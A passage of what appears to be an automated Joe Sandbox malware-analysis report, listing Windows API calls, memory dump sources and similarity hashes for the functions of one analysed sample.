                                                                                                • Part of subcall function 00CAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6C4
                                                                                                • Part of subcall function 00CAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6F2
                                                                                                • Part of subcall function 00CAA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6FE
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1464966427-0
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00CB0E3D
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00CBA62C
                                                                                                • Part of subcall function 00CBA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CBA3DA
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              APIs
                                                                                              • DloadProtectSection.DELAYIMP ref: 00CBE5E3
                                                                                              Similarity
                                                                                              • API ID: DloadProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 2203082970-0
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CB1B3E), ref: 00CBDD92
                                                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046E,?), ref: 00CBB59E
                                                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,00CA97BE), ref: 00CA98C8
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ed4baedd68a5afb1a8c8ac7eaae62bd6fe0969279a67956e79ae35dc29a3814f
                                                                                              • Instruction ID: d4f675eeeaa327df9ebf077e12d75ccae46746ee5b3912faf4c5acfddca816fe
                                                                                              • Opcode Fuzzy Hash: ed4baedd68a5afb1a8c8ac7eaae62bd6fe0969279a67956e79ae35dc29a3814f
                                                                                              • Instruction Fuzzy Hash: 26B012F125C101AC3504510F2D02DFB01CDC0C4F10B30C03FF809C02C1EC41AD016432
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fe3cebdca12894b6ee72982ea4fe4268f3a3847e6e983bf0c9b37fc4f80053b1
                                                                                              • Instruction ID: 4f64887353dc7eda4b0924be154f0a17439239bdf57bc9bebd371a9dd299a57b
                                                                                              • Opcode Fuzzy Hash: fe3cebdca12894b6ee72982ea4fe4268f3a3847e6e983bf0c9b37fc4f80053b1
                                                                                              • Instruction Fuzzy Hash: 3EB012E125D541AC3508910E2C02DFB014EC0C5F10B30C03FFC09C02C1E840EC006472
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4d165326352d3afedb407aa3075bbdc4751377b13ef937181b442d5ef69dac19
                                                                                              • Instruction ID: 6fdf30107f5f7a0ab7adbd60151e70604b03f817046244992d9388ecb2c4eabc
                                                                                              • Opcode Fuzzy Hash: 4d165326352d3afedb407aa3075bbdc4751377b13ef937181b442d5ef69dac19
                                                                                              • Instruction Fuzzy Hash: FCB012F125D641BC3548920E2C02DFB014EC0C4F10B30C13FF809C02C1E840AC446432
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 19fa2761a52d180a0a7a11f64c372d44a7114d3befc08254fb19400903e11c44
                                                                                              • Instruction ID: 442f000cfad36dc76575557df7f4efce01fe59498a71b9c80a474985ce7f2ae8
                                                                                              • Opcode Fuzzy Hash: 19fa2761a52d180a0a7a11f64c372d44a7114d3befc08254fb19400903e11c44
                                                                                              • Instruction Fuzzy Hash: 66B012E125C101AC3504511E2C02DFF018DC0C5F10730C03FFD09C02C1E840EC006472
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a28190b67e0b7f4ef833cf474ff84e99ee27522285030feb39c2069288e7cb10
                                                                                              • Instruction ID: 75cce6212252205b38927806dc2d070335edd928cf523c67bee5a5c2c3add2dc
                                                                                              • Opcode Fuzzy Hash: a28190b67e0b7f4ef833cf474ff84e99ee27522285030feb39c2069288e7cb10
                                                                                              • Instruction Fuzzy Hash: 0CB012E126D541AC3508910E2C02DFB018EC4C8F10B30C03FF80AC02C1E840AC006432
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 2df22d4585f61ea0475a788664994510f319c6416fb5c56298a2e724da89cc8f
                                                                                              • Instruction ID: 17ec28fa73fb479abfc3204f2475adfe905fb9f7f975a2594d5ebf048d24b32e
                                                                                              • Opcode Fuzzy Hash: 2df22d4585f61ea0475a788664994510f319c6416fb5c56298a2e724da89cc8f
                                                                                              • Instruction Fuzzy Hash: 4DB092A1258201AC2504520A2902DBA014DC084F10730C03AB809C02C1E851AD496432
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ffbceb8e7014c56ef454a853a53a301480b8f7a57bbabda8c2b51906b553055d
                                                                                              • Instruction ID: 1f3e72252a68b9ef126da08d7f7c90eb7ec25693f6ea6828aa50cd0d0a0b5213
                                                                                              • Opcode Fuzzy Hash: ffbceb8e7014c56ef454a853a53a301480b8f7a57bbabda8c2b51906b553055d
                                                                                              • Instruction Fuzzy Hash: 05B092A1258241AC2544520A2802DBA014DC084F10730C13AB809C02C1E840AC446432
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ad66bd59e65e7127cb329858ea9aee58d37eca361ca0cde44ed3488acdcdb506
                                                                                              • Instruction ID: 54954f5e521f3fd650e58e2a499e97227397e0f9d3614c87a177ad85bd605138
                                                                                              • Opcode Fuzzy Hash: ad66bd59e65e7127cb329858ea9aee58d37eca361ca0cde44ed3488acdcdb506
                                                                                              • Instruction Fuzzy Hash: A0B012F125D101BC3504510E2C02DFB014DC0C5F10730C03FFC09C02C1E840ED006472
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
